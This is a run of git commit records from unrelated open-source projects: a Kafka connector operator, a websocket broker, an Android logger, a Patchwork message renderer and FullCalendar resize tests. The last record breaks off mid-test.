(connect == null && connectS2i == null) { <del> updateStatus(noConnectCluster(connectNamespace, connectName), kafkaConnector, connectOperator.connectorOperator); <del> return Future.succeededFuture(); <del> } else if (connect != null) { <del> // grab the lock and call reconcileConnectors() <del> // (i.e. short circuit doing a whole KafkaConnect reconciliation). <del> Reconciliation reconciliation = new Reconciliation("connector-watch", connectOperator.kind(), <del> kafkaConnector.getMetadata().getNamespace(), connectName); <del> if (connectS2i != null) { <del> log.warn("{}: There is both a KafkaConnect resource and a KafkaConnectS2I resource named {}. " + <del> "The KafkaConnect takes precedence for the connector {}", <del> reconciliation, connectName, connect.getMetadata().getName()); <del> } <del> return connectOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, <del> () -> connectOperator.reconcileConnector(reconciliation, <del> KafkaConnectResources.serviceName(connectName), apiClient, <del> isUseResources(connect), <del> kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector)); <del> } else { <del> // grab the lock and call reconcileConnectors() <del> // (i.e. short circuit doing a whole KafkaConnect reconciliation). <del> Reconciliation r = new Reconciliation("connector-watch", connectS2IOperator.kind(), <del> kafkaConnector.getMetadata().getNamespace(), connectName); <del> return connectS2IOperator.withLock(r, LOCK_TIMEOUT_MS, <del> () -> connectS2IOperator.reconcileConnector(r, <del> KafkaConnectResources.serviceName(connectName), apiClient, <del> isUseResources(connectS2i), <del> kafkaConnector.getMetadata().getName(), action == Action.DELETED ? 
null : kafkaConnector)); <del> } <del> } <del> ); <del> } else { <del> updateStatus(new InvalidResourceException("Resource lacks label '" <del> + Labels.STRIMZI_CLUSTER_LABEL <del> + "': No connect cluster in which to create this connector."), <del> kafkaConnector, connectOperator.connectorOperator); <add> <add> switch (action) { <add> case ADDED: <add> case DELETED: <add> case MODIFIED: <add> Future<Void> f; <add> if (connectName != null) { <add> // Check whether a KafkaConnect/S2I exists <add> CompositeFuture.join(connectOperator.resourceOperator.getAsync(connectNamespace, connectName), <add> connectOperator.pfa.supportsS2I() ? <add> connectS2IOperator.resourceOperator.getAsync(connectNamespace, connectName) : <add> Future.succeededFuture()) <add> .compose(cf -> { <add> KafkaConnect connect = cf.resultAt(0); <add> KafkaConnectS2I connectS2i = cf.resultAt(1); <add> KafkaConnectApi apiClient = connectOperator.connectClientProvider.apply(connectOperator.vertx); <add> if (connect == null && connectS2i == null) { <add> log.info("{} {} in namespace {} was {}, but Connect cluster {} does not exist", connectorKind, connectorName, connectorNamespace, action, connectName); <add> updateStatus(noConnectCluster(connectNamespace, connectName), kafkaConnector, connectOperator.connectorOperator); <add> return Future.succeededFuture(); <add> } else if (connect != null) { <add> // grab the lock and call reconcileConnectors() <add> // (i.e. short circuit doing a whole KafkaConnect reconciliation). <add> Reconciliation reconciliation = new Reconciliation("connector-watch", connectOperator.kind(), <add> kafkaConnector.getMetadata().getNamespace(), connectName); <add> log.info("{}: {} {} in namespace {} was {}", reconciliation, connectorKind, connectorName, connectorNamespace, action); <add> <add> if (connectS2i != null) { <add> log.warn("{}: There is both a KafkaConnect resource and a KafkaConnectS2I resource named {}. " + <add> "The KafkaConnect takes precedence for the connector {}", <add> reconciliation, connectName, connect.getMetadata().getName()); <add> } <add> return connectOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, <add> () -> connectOperator.reconcileConnector(reconciliation, <add> KafkaConnectResources.serviceName(connectName), apiClient, <add> isUseResources(connect), <add> kafkaConnector.getMetadata().getName(), action == Action.DELETED ? null : kafkaConnector) <add> .compose(reconcileResult -> { <add> log.info("{}: reconciled", reconciliation); <add> return Future.succeededFuture(reconcileResult); <add> })); <add> } else { <add> // grab the lock and call reconcileConnectors() <add> // (i.e. short circuit doing a whole KafkaConnect reconciliation). <add> Reconciliation reconciliation = new Reconciliation("connector-watch", connectS2IOperator.kind(), <add> kafkaConnector.getMetadata().getNamespace(), connectName); <add> log.info("{}: {} {} in namespace {} was {}", reconciliation, connectorKind, connectorName, connectorNamespace, action); <add> <add> return connectS2IOperator.withLock(reconciliation, LOCK_TIMEOUT_MS, <add> () -> connectS2IOperator.reconcileConnector(reconciliation, <add> KafkaConnectResources.serviceName(connectName), apiClient, <add> isUseResources(connectS2i), <add> kafkaConnector.getMetadata().getName(), action == Action.DELETED ? 
null : kafkaConnector) <add> .compose(reconcileResult -> { <add> log.info("{}: reconciled", reconciliation); <add> return Future.succeededFuture(reconcileResult); <add> })); <add> } <add> }); <add> } else { <add> updateStatus(new InvalidResourceException("Resource lacks label '" <add> + Labels.STRIMZI_CLUSTER_LABEL <add> + "': No connect cluster in which to create this connector."), <add> kafkaConnector, connectOperator.connectorOperator); <add> } <add> <add> break; <add> case ERROR: <add> log.error("Failed {} {} in namespace {} ", connectorKind, connectorName, connectorNamespace); <add> break; <add> default: <add> log.error("Unknown action: {} {} in namespace {}", connectorKind, connectorName, connectorNamespace); <ide> } <ide> } <ide> <ide> ).compose(cf -> { <ide> List<String> runningConnectorNames = cf.resultAt(0); <ide> List<KafkaConnector> desiredConnectors = cf.resultAt(1); <del> log.debug("{}: {}} cluster: required connectors: {}", reconciliation, kind(), desiredConnectors); <add> log.debug("{}: {} cluster: required connectors: {}", reconciliation, kind(), desiredConnectors); <ide> Set<String> deleteConnectorNames = new HashSet<>(runningConnectorNames); <ide> deleteConnectorNames.removeAll(desiredConnectors.stream().map(c -> c.getMetadata().getName()).collect(Collectors.toSet())); <del> log.debug("{}: {}} cluster: delete connectors: {}", reconciliation, kind(), deleteConnectorNames); <add> log.debug("{}: {} cluster: delete connectors: {}", reconciliation, kind(), deleteConnectorNames); <ide> Stream<Future<Void>> deletionFutures = deleteConnectorNames.stream().map(connectorName -> <ide> reconcileConnector(reconciliation, host, apiClient, useResources, connectorName, null) <ide> ); <ide> private Future<Void> reconcileConnector(Reconciliation reconciliation, String host, KafkaConnectApi apiClient, boolean useResources, String connectorName, KafkaConnector connector) { <ide> if (connector == null) { <ide> if (useResources) { <del> log.debug("{}: {}} cluster: deleting connector: {}", reconciliation, kind(), connectorName); <add> log.info("{}: deleting connector: {}", reconciliation, connectorName); <ide> return apiClient.delete(host, KafkaConnectCluster.REST_API_PORT, connectorName); <ide> } else { <ide> return Future.succeededFuture(); <ide> } <ide> } else { <del> log.debug("{}: {}} cluster: creating/updating connector: {}", reconciliation, kind(), connectorName); <add> log.info("{}: creating/updating connector: {}", reconciliation, connectorName); <ide> if (connector.getSpec() == null) { <ide> return maybeUpdateConnectorStatus(reconciliation, connector, null, <ide> new InvalidResourceException("spec property is required"));
Java
apache-2.0
5f6f1ee5e47fee02a9983599bab92854102fd59c
0
aktin/broker,aktin/broker,aktin/broker,aktin/broker
package org.aktin.broker.websocket; import java.io.IOException; import java.util.Objects; import java.util.Set; import java.util.function.Predicate; import java.util.logging.Level; import javax.websocket.OnClose; import javax.websocket.OnError; import javax.websocket.OnMessage; import javax.websocket.OnOpen; import javax.websocket.Session; import org.aktin.broker.auth.Principal; import lombok.extern.java.Log; @Log public abstract class AbstractBroadcastWebsocket { protected abstract boolean isAuthorized(Principal principal); protected abstract void addSession(Session session, Principal user); protected abstract void removeSession(Session session, Principal user); @OnOpen public void open(Session session){ Principal user = getSessionPrincipal(session); log.log(Level.INFO, "Websocket session {0} created for user {1}", new Object[] {session.getId(), user}); // check privileges and close session if needed if( isAuthorized(user) ) { addSession(session, user); }else { // unauthorized, close session try { session.close(); return; } catch (IOException e) { log.log(Level.WARNING,"Failed to close session", e); } } // send welcome message try { session.getBasicRemote().sendText("welcome "+user.getName()); } catch (IOException e) { log.log(Level.WARNING,"Unable to send welcome message", e); } } @OnClose public void close(Session session){ Principal user = getSessionPrincipal(session); removeSession(session, user); log.log(Level.INFO, "Websocket session {0} closed for user {1}", new Object[] {session.getId(), user}); } @OnMessage public void message(Session session, String message){ Principal user = getSessionPrincipal(session); if( message.startsWith("ping ") ) { // TODO send pong and handle in client }else { log.log(Level.INFO, "Ignoring message from client {0}",user.getName()); } } @OnError public void error(Session session, Throwable t) { Principal user = getSessionPrincipal(session); log.log(Level.INFO, "Websocket session {0} error for user {1}: {2}", new Object[] {session.getId(), user, t}); } static int broadcast(Set<Session> clients, String message){ // if no filter is supplied, broadcast to all nodes return broadcast(clients, message, p -> true); } static int broadcast(Set<Session> clients, String message, Predicate<Principal> principalFilter){ Objects.requireNonNull(principalFilter); if( clients.isEmpty() ){ return 0; } int count = 0; // loop through connected clients for( Session session : clients ){ Principal user = getSessionPrincipal(session); if( user == null ) { log.log(Level.WARNING,"Skipping websocket session {0} without authentication",session.getId()); continue; } if( principalFilter.test(user) == false ) { // skip filtered continue; } if( session.isOpen() ){ session.getAsyncRemote().sendText(message); count ++; } } return count; } /** * Get authentication info for a given websocket session * @param session session * @return principal */ protected static Principal getSessionPrincipal(Session session) { return (Principal)session.getUserProperties().get(HeaderAuthSessionConfigurator.AUTH_USER); } }
broker-server/src/main/java/org/aktin/broker/websocket/AbstractBroadcastWebsocket.java
package org.aktin.broker.websocket; import java.io.IOException; import java.util.Objects; import java.util.Set; import java.util.function.Predicate; import java.util.logging.Level; import javax.websocket.OnClose; import javax.websocket.OnError; import javax.websocket.OnMessage; import javax.websocket.OnOpen; import javax.websocket.Session; import org.aktin.broker.auth.Principal; import lombok.extern.java.Log; @Log public abstract class AbstractBroadcastWebsocket { protected abstract boolean isAuthorized(Principal principal); protected abstract void addSession(Session session, Principal user); protected abstract void removeSession(Session session, Principal user); @OnOpen public void open(Session session){ Principal user = getSessionPrincipal(session); log.log(Level.INFO, "Websocket session {0} created for user {1}", new Object[] {session.getId(), user}); // check privileges and close session if needed if( isAuthorized(user) ) { addSession(session, user); }else { // unauthorized, close session try { session.close(); return; } catch (IOException e) { log.log(Level.WARNING,"Failed to close session", e); } } // send welcome message try { session.getBasicRemote().sendText("welcome "+user.getName()); } catch (IOException e) { log.log(Level.WARNING,"Unable to send welcome message", e); } } @OnClose public void close(Session session){ removeSession(session, getSessionPrincipal(session)); log.info("Websocket session closed: "+session.getId()); } @OnMessage public void message(Session session, String message){ Principal user = getSessionPrincipal(session); log.log(Level.INFO, "Ignoring message from client {0}",user.getName()); } @OnError public void error(Session session, Throwable t) { log.log(Level.INFO, "Websocket error reported for session {0}: {1}", new Object[] {session.getId(), t}); } static int broadcast(Set<Session> clients, String message){ // if no filter is supplied, broadcast to all nodes return broadcast(clients, message, p -> true); } static int broadcast(Set<Session> clients, String message, Predicate<Principal> principalFilter){ Objects.requireNonNull(principalFilter); if( clients.isEmpty() ){ return 0; } int count = 0; // loop through connected clients for( Session session : clients ){ Principal user = getSessionPrincipal(session); if( user == null ) { log.log(Level.WARNING,"Skipping websocket session {0} without authentication",session.getId()); continue; } if( principalFilter.test(user) == false ) { // skip filtered continue; } if( session.isOpen() ){ session.getAsyncRemote().sendText(message); count ++; } } return count; } /** * Get authentication info for a given websocket session * @param session session * @return principal */ protected static Principal getSessionPrincipal(Session session) { return (Principal)session.getUserProperties().get(HeaderAuthSessionConfigurator.AUTH_USER); } }
Also log the username during websocket session close and errors. Ignore "ping .*" messages from websocket clients.
broker-server/src/main/java/org/aktin/broker/websocket/AbstractBroadcastWebsocket.java
Also log the username during websocket session close and errors. Ignore "ping .*" messages from websocket clients.
<ide><path>roker-server/src/main/java/org/aktin/broker/websocket/AbstractBroadcastWebsocket.java <ide> } <ide> @OnClose <ide> public void close(Session session){ <del> removeSession(session, getSessionPrincipal(session)); <del> log.info("Websocket session closed: "+session.getId()); <add> Principal user = getSessionPrincipal(session); <add> removeSession(session); <add> log.info("Websocket session {0} closed for user {1} ",new Object[] {session.getId(), user}); <ide> } <ide> <ide> @OnMessage <ide> public void message(Session session, String message){ <ide> Principal user = getSessionPrincipal(session); <del> log.log(Level.INFO, "Ignoring message from client {0}",user.getName()); <add> if( message.startsWith("ping ") ) { <add> // TODO send pong and handle in client <add> }else { <add> log.log(Level.INFO, "Ignoring message from client {0}",user.getName()); <add> } <ide> } <ide> @OnError <ide> public void error(Session session, Throwable t) { <del> log.log(Level.INFO, "Websocket error reported for session {0}: {1}", new Object[] {session.getId(), t}); <add> Principal user = getSessionPrincipal(session); <add> log.log(Level.INFO, "Websocket session {0} error for user {1}: {2}", new Object[] {session.getId(), user, t}); <ide> } <ide> <ide> static int broadcast(Set<Session> clients, String message){
Java
apache-2.0
error: pathspec 'code/Logger.java' did not match any file(s) known to git
084b7d2b3f53410d3aa3f11a99bc8a0216cf8ac3
1
scijoker/logger
package com.onebit.logger; import android.os.Build; import android.util.Log; import org.json.JSONArray; import org.json.JSONException; import org.json.JSONObject; /** * Created by scijoker on 08.10.15. */ public class Logger { public static void d(String tag, String arg) { Log.d(tag, arg); } public static void dd(String tag, Object source) { if (isJSONValid(source)) { try { format(tag, new JSONObject(source.toString()).toString(2)); } catch (JSONException e) { e.printStackTrace(); } } else { format(tag, source); } } private static void format(String tag, Object source) { tag = " " + tag + " "; d(" ", " "); d(" ", getSplitter(50) + tag + getSplitter(50)); d(" ", "" + source); d(" ", getSplitter(100 + tag.length())); d(" ", " "); } private static String getSplitter(int length) { StringBuilder builder = new StringBuilder(); for (int i = 0; i < length; i++) { builder.append("-"); } return builder.toString(); } private static boolean isJSONValid(Object test) { try { new JSONObject(test.toString()); } catch (JSONException ex) { try { if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) { new JSONArray(test); } } catch (JSONException ex1) { return false; } } return true; } }
code/Logger.java
Create Logger.java
code/Logger.java
Create Logger.java
<ide><path>ode/Logger.java <add>package com.onebit.logger; <add> <add>import android.os.Build; <add>import android.util.Log; <add> <add>import org.json.JSONArray; <add>import org.json.JSONException; <add>import org.json.JSONObject; <add> <add>/** <add> * Created by scijoker on 08.10.15. <add> */ <add>public class Logger { <add> <add> public static void d(String tag, String arg) { <add> Log.d(tag, arg); <add> } <add> <add> public static void dd(String tag, Object source) { <add> if (isJSONValid(source)) { <add> try { <add> format(tag, new JSONObject(source.toString()).toString(2)); <add> } catch (JSONException e) { <add> e.printStackTrace(); <add> } <add> } else { <add> format(tag, source); <add> } <add> } <add> <add> private static void format(String tag, Object source) { <add> tag = " " + tag + " "; <add> d(" ", " "); <add> d(" ", getSplitter(50) + tag + getSplitter(50)); <add> d(" ", "" + source); <add> d(" ", getSplitter(100 + tag.length())); <add> d(" ", " "); <add> } <add> <add> private static String getSplitter(int length) { <add> StringBuilder builder = new StringBuilder(); <add> for (int i = 0; i < length; i++) { <add> builder.append("-"); <add> } <add> return builder.toString(); <add> } <add> <add> private static boolean isJSONValid(Object test) { <add> try { <add> new JSONObject(test.toString()); <add> } catch (JSONException ex) { <add> try { <add> if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) { <add> new JSONArray(test); <add> } <add> } catch (JSONException ex1) { <add> return false; <add> } <add> } <add> return true; <add> } <add>}
JavaScript
agpl-3.0
736ceaf8051d00d3abbe6e40c16901c0e9ef420c
0
ssbc/patchwork,ssbc/patchwork
var h = require('../lib/h') var plugs = require('patchbay/plugs') var message_content = plugs.first(exports.message_content = []) var message_content_mini = plugs.first(exports.message_content_mini = []) var message_link = plugs.first(exports.message_link = []) var avatar_image = plugs.first(exports.avatar_image = []) var avatar_name = plugs.first(exports.avatar_name = []) var avatar_link = plugs.first(exports.avatar_link = []) var message_meta = plugs.map(exports.message_meta = []) var message_main_meta = plugs.map(exports.message_main_meta = []) var message_action = plugs.map(exports.message_action = []) var contextMenu = require('../lib/context-menu') exports.message_render = function (msg, inContext) { var elMini = message_content_mini(msg) if (elMini) { var div = h('Message', { 'ev-contextmenu': contextMenu.bind(null, msg) }, [ h('header', [ h('div', [ avatar_link(msg.value.author, avatar_name(msg.value.author), ''), ' ', elMini ]), h('div.message_meta.row', [message_meta(msg)]) ]) ]) div.setAttribute('tabindex', '0') return div } var el = message_content(msg) if (!el) return var classList = [] var replyInfo = null if (msg.value.content.root) { classList.push('-reply') if (!inContext) { replyInfo = h('span', ['in reply to ', message_link(msg.value.content.root)]) } } var element = h('Message', { classList, 'ev-contextmenu': contextMenu.bind(null, msg), 'ev-keydown': function (ev) { // on enter, hit first meta. if (ev.keyCode === 13) { element.querySelector('.enter').click() } } }, [ h('header', [ h('div.main', [ h('a.avatar', {href: `#${msg.value.author}`}, avatar_image(msg.value.author)), h('div.main', [ h('div.name', [ h('a', {href: `#${msg.value.author}`}, avatar_name(msg.value.author)) ]), h('div.meta', [ message_main_meta(msg), ' ', replyInfo ]) ]) ]), h('div.meta', message_meta(msg)) ]), h('section', [el]), h('footer', [ h('div.actions', [ message_action(msg), h('a', {href: '#' + msg.key}, 'Reply') ]) ]) ]) // ); hyperscript does not seem to set attributes correctly. element.setAttribute('tabindex', '0') return element }
modules/message.js
var h = require('../lib/h') var plugs = require('patchbay/plugs') var message_content = plugs.first(exports.message_content = []) var message_content_mini = plugs.first(exports.message_content_mini = []) var message_link = plugs.first(exports.message_link = []) var avatar_image = plugs.first(exports.avatar_image = []) var avatar_name = plugs.first(exports.avatar_name = []) var avatar_link = plugs.first(exports.avatar_link = []) var message_meta = plugs.map(exports.message_meta = []) var message_main_meta = plugs.map(exports.message_main_meta = []) var message_action = plugs.map(exports.message_action = []) var contextMenu = require('../lib/context-menu') exports.message_render = function (msg, inContext) { var elMini = message_content_mini(msg) if (elMini) { var div = h('Message', { 'ev-contextmenu': contextMenu.bind(null, msg) }, [ h('header', [ h('div', [ avatar_link(msg.value.author, avatar_name(msg.value.author), ''), ' ', elMini ]), h('div.message_meta.row', message_meta(msg)) ]) ]) div.setAttribute('tabindex', '0') return div } var el = message_content(msg) if (!el) return var classList = [] var replyInfo = null if (msg.value.content.root) { classList.push('-reply') if (!inContext) { replyInfo = h('span', ['in reply to ', message_link(msg.value.content.root)]) } } var element = h('Message', { classList, 'ev-contextmenu': contextMenu.bind(null, msg), 'ev-keydown': function (ev) { // on enter, hit first meta. if (ev.keyCode === 13) { element.querySelector('.enter').click() } } }, [ h('header', [ h('div.main', [ h('a.avatar', {href: `#${msg.value.author}`}, avatar_image(msg.value.author)), h('div.main', [ h('div.name', [ h('a', {href: `#${msg.value.author}`}, avatar_name(msg.value.author)) ]), h('div.meta', [ message_main_meta(msg), ' ', replyInfo ]) ]) ]), h('div.meta', message_meta(msg)) ]), h('section', [el]), h('footer', [ h('div.actions', [ message_action(msg), h('a', {href: '#' + msg.key}, 'Reply') ]) ]) ]) // ); hyperscript does not seem to set attributes correctly. element.setAttribute('tabindex', '0') return element }
message: fix a hyperscript typo
modules/message.js
message: fix a hyperscript typo
<ide><path>odules/message.js <ide> avatar_link(msg.value.author, avatar_name(msg.value.author), ''), <ide> ' ', elMini <ide> ]), <del> h('div.message_meta.row', message_meta(msg)) <add> h('div.message_meta.row', [message_meta(msg)]) <ide> ]) <ide> ]) <ide> div.setAttribute('tabindex', '0')
JavaScript
mit
34d945eb463a7a2d3509636d597f3410ef1ffc0f
0
oleg-babintsev/fullcalendar,MeteorAdminz/fullcalendar,fullcalendar/fullcalendar,MeteorAdminz/fullcalendar,deepskyr/fullcalendar,deepskyr/fullcalendar,MeteorAdminz/fullcalendar,avanti-technologies/fullcalendar,kleisauke/fullcalendar,rgnevashev/fullcalendar,deepskyr/fullcalendar,fullcalendar/fullcalendar,fullcalendar/fullcalendar,rgnevashev/fullcalendar,pietervisser/fullcalendar,blubberly/fullcalendar,rgnevashev/fullcalendar,MeteorAdminz/fullcalendar,pietervisser/fullcalendar,rgnevashev/fullcalendar,avanti-technologies/fullcalendar,pietervisser/fullcalendar,kleisauke/fullcalendar,avanti-technologies/fullcalendar,fullcalendar/fullcalendar,laoneo/fullcalendar,oleg-babintsev/fullcalendar,avanti-technologies/fullcalendar,oleg-babintsev/fullcalendar,arshaw/fullcalendar,deepskyr/fullcalendar,arshaw/fullcalendar,arshaw/fullcalendar,arshaw/fullcalendar,laoneo/fullcalendar,blubberly/fullcalendar,laoneo/fullcalendar,kleisauke/fullcalendar,blubberly/fullcalendar,blubberly/fullcalendar,kleisauke/fullcalendar
describe('eventResize', function() { var options; beforeEach(function() { options = { defaultDate: '2014-06-11', editable: true }; affix('#cal'); }); afterEach(function() { $('#cal').fullCalendar('destroy'); }); describe('when in month view', function() { beforeEach(function() { options.defaultView = 'month'; }); describe('when resizing an all-day event with mouse', function() { it('should have correct arguments with a whole-day delta', function(done) { options.events = [ { title: 'all-day event', start: '2014-06-11', allDay: true } ]; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('.fc-day').width() * -2.5, // guarantee 2 days to left dy: $('.fc-day').height() }); }, function(event, delta, revertFunc) { expect(delta.asDays()).toBe(5); expect(delta.hours()).toBe(0); expect(delta.minutes()).toBe(0); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toEqualMoment('2014-06-17'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toBeNull(); done(); } ); }); }); describe('when resizing an all-day event via touch', function() { it('should have correct arguments with a whole-day delta', function(done) { options.isTouch = true; options.longPressDelay = 100; options.dragRevertDuration = 0; // so that eventDragStop happens immediately after touchend options.events = [ { title: 'all-day event', start: '2014-06-11', allDay: true } ]; init( function() { $('.fc-event').simulate('drag', { isTouch: true, delay: 200, onRelease: function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('.fc-day').width() * -2.5, // guarantee 2 days to left dy: $('.fc-day').height(), isTouch: true }); } }); }, function(event, delta, revertFunc) { expect(delta.asDays()).toBe(5); expect(delta.hours()).toBe(0); expect(delta.minutes()).toBe(0); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toEqualMoment('2014-06-17'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toBeNull(); done(); } ); }); }); describe('when rendering a timed event', function() { it('should not have resize capabilities', function(done) { options.events = [ { title: 'timed event', start: '2014-06-11T08:00:00', allDay: false } ]; options.eventAfterAllRender = function() { expect($('.fc-event .fc-resizer').length).toBe(0); done(); }; $('#cal').fullCalendar(options); }); }); }); describe('when in agenda view', function() { beforeEach(function() { options.defaultView = 'agendaWeek'; }); describe('when resizing an all-day event', function() { it('should have correct arguments with a whole-day delta', function(done) { options.events = [ { title: 'all-day event', start: '2014-06-11', allDay: true } ]; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('th.fc-wed').width() * 1.5 // two days }); }, function(event, delta, revertFunc) { expect(delta.asDays()).toBe(2); expect(delta.hours()).toBe(0); expect(delta.minutes()).toBe(0); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toEqualMoment('2014-06-14'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11'); expect(event.end).toBeNull(); done(); } ); }); }); describe('when resizing a timed event with an end', function() { beforeEach(function() { options.events = [ { title: 'timed event event', start: '2014-06-11T05:00:00', end: 
'2014-06-11T07:00:00', allDay: false } ]; }); it('should have correct arguments with a timed delta', function(done) { init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T09:30:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00'); done(); } ); }); // TODO: test RTL it('should have correct arguments with a timed delta when resized to a different day', function(done) { init( function() { $('.fc-event .fc-resizer').simulate('drag', { dx: $('.fc-day-header:first').width() * .9, // one day dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(1); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-12T09:30:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00'); done(); } ); }); it('should have correct arguments with a timed delta, when timezone is local', function(done) { options.timezone = 'local'; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment(moment('2014-06-11T05:00:00')); // compate to local moment expect(event.end).toEqualMoment(moment('2014-06-11T09:30:00')); revertFunc(); expect(event.start).toEqualMoment(moment('2014-06-11T05:00:00')); expect(event.end).toEqualMoment(moment('2014-06-11T07:00:00')); done(); } ); }); it('should have correct arguments with a timed delta, when timezone is UTC', function(done) { options.timezone = 'UTC'; init( function() { $('.fc-event .fc-resizer').simulate('drag', { dy: $('.fc-slats tr:eq(1)').height() * 4.5 // 5 slots, so 2.5 hours }); }, function(event, delta, revertFunc) { expect(delta.days()).toBe(0); expect(delta.hours()).toBe(2); expect(delta.minutes()).toBe(30); expect(delta.seconds()).toBe(0); expect(delta.milliseconds()).toBe(0); expect(event.start).toEqualMoment('2014-06-11T05:00:00+00:00'); expect(event.end).toEqualMoment('2014-06-11T09:30:00+00:00'); revertFunc(); expect(event.start).toEqualMoment('2014-06-11T05:00:00+00:00'); expect(event.end).toEqualMoment('2014-06-11T07:00:00+00:00'); done(); } ); }); it('should display the correct time text while resizing', function(done) { options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper .fc-time')).toHaveText('5:00 - 9:30'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); 
expect($('.fc-event')).toBeVisible(); expect($('.fc-event .fc-time')).toHaveText('5:00 - 7:00'); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); it('should run the temporarily rendered event through eventRender', function(done) { options.eventRender = function(event, element) { element.addClass('didEventRender'); }; options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).toHaveClass('didEventRender'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); it('should not fire the windowResize handler', function(done) { // bug 1116 // has to do this crap because PhantomJS was trigger false window resizes unrelated to the fc-event resize var alreadyRendered = false; var isDragging = false; var calledWhileDragging = false; options.windowResizeDelay = 0; options.windowResize = function(ev) { if (isDragging) { calledWhileDragging = true; } }; options.eventAfterAllRender = function() { if (alreadyRendered) { return; } alreadyRendered = true; setTimeout(function() { isDragging = true; $('.fc-event .fc-resizer').simulate('drag', { dy: 100, onBeforeRelease: function() { isDragging = false; }, onRelease: function() { expect(calledWhileDragging).toBe(false); done(); } }); }, 100); // hack for PhantomJS. after any initial false window resizes }; $('#cal').fullCalendar(options); }); }); describe('when resizing a timed event without an end', function() { beforeEach(function() { options.events = [ { title: 'timed event event', start: '2014-06-11T05:00:00', allDay: false } ]; }); it('should display the correct time text while resizing', function(done) { options.eventAfterAllRender = function() { setTimeout(function() { var dy = $('.fc-slats tr:eq(1)').height() * 5; // 5 slots, so 2.5 hours $('.fc-event .fc-resizer').simulate('drag', { dy: dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper .fc-time')).toHaveText('5:00 - 9:30'); $('.fc-event.fc-helper .fc-resizer').simulate('drag', { dy: -dy, onBeforeRelease: function() { expect($('.fc-event.fc-helper')).not.toExist(); expect($('.fc-event')).toBeVisible(); expect($('.fc-event .fc-time')).toHaveText('5:00'); }, onRelease: function() { done(); } }); } }); }, 0); // idk }; $('#cal').fullCalendar(options); }); }); }); // Initialize a calendar, run a resize, and do type-checking of all arguments for all handlers. 
// TODO: more descrimination instead of just checking for 'object' function init(resizeStartFunc, resizeDoneFunc) { var eventsRendered = false; options.eventAfterAllRender = function() { if (!eventsRendered) { // because event rerendering will happen when resize is over resizeStartFunc(); eventsRendered = true; } }; options.eventResizeStart = function(event, jsEvent, uiEvent, view) { expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); expect(typeof view).toBe('object'); }; options.eventResizeStop = function(event, jsEvent, uiEvent, view) { expect(options.eventResizeStart).toHaveBeenCalled(); expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); expect(typeof view).toBe('object'); }; options.eventResize = function(event, delta, revertFunc, jsEvent, uiEvent, view) { expect(options.eventResizeStop).toHaveBeenCalled(); expect(this instanceof Element).toBe(true); expect(this).toHaveClass('fc-event'); expect(typeof event).toBe('object'); expect(moment.isDuration(delta)).toBe(true); expect(typeof revertFunc).toBe('function'); expect(typeof jsEvent).toBe('object'); expect(typeof uiEvent).toBe('object'); // might be a 